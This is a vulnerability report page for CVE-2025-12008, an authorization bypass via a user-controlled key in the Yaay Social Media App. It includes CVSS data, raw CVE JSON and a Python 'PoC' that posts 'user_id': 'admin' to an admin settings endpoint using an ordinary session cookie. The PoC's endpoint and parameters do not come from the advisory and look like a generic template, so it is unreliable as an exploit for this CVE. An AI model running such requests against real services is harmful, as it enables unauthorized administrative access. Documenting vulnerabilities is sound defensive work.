Security Vulnerability Report
中文
CVE-2025-12008 CVSS 8.8 HIGH

CVE-2025-12008

Published: 2026-05-14 13:16:16
Last Modified: 2026-05-14 16:20:13

Description

Authorization bypass through User-Controlled key vulnerability in APPYAP Technology and Information Inc. Yaay Social Media App allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Yaay Social Media App: from 3.8.0 through 24102025.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Yaay Social Media App 3.8.0 - 24102025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Vulnerability: Authorization bypass via User-Controlled Key # Target: Yaay Social Media App (Affected Versions) url = "https://target-app.com/api/v1/admin/settings" headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json", # Normal user session cookie "Cookie": "session_id=normal_user_session_token" } # Exploit: Manipulate the user-controlled key (e.g., user_id or role_key) # to impersonate an administrator or access restricted ACLs. payload = { "user_id": "admin", # Modified key to bypass authorization "action": "update_config" } response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("[+] Authorization bypass successful!") print(f"[+] Response: {response.text}") else: print("[-] Failed to exploit")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12008", "sourceIdentifier": "[email protected]", "published": "2026-05-14T13:16:16.133", "lastModified": "2026-05-14T16:20:13.477", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization bypass through User-Controlled key vulnerability in APPYAP Technology and Information Inc. Yaay Social Media App allows Accessing Functionality Not Properly Constrained by ACLs.\n\nThis issue affects Yaay Social Media App: from 3.8.0 through 24102025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0238", "source": "[email protected]"}]}}